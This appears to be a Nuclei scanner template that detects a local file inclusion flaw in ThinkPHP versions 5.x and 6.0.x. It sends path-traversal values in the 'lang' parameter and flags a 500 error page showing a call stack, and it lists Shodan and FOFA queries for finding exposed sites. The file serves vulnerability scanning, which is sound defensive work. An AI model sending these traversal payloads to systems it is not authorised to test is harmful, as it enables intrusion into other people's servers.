id: thinkphp6-lang-lfi

info:
  name: Thinkphp Lang - LFI
  author: kagamigawa
  severity: high
  description: |
    Thinkphp,v6.0.1~v6.0.13, v5.0.x~v5.1.41, v5.0.0~v5.0.24 vulnerable to LFI.
  reference:
    - https://tttang.com/archive/1865/
  metadata:
    verified: true
    shodan-query: title:"Thinkphp"
    fofa-query: header="think_lang"
  tags: thinkphp,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?lang=../../thinkphp/base"
      - "{{BaseURL}}/?lang=../../../../../vendor/topthink/think-trace/src/TraceDebug"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Call Stack'
          - 'class="trace'
        condition: and

      - type: status
        status:
          - 500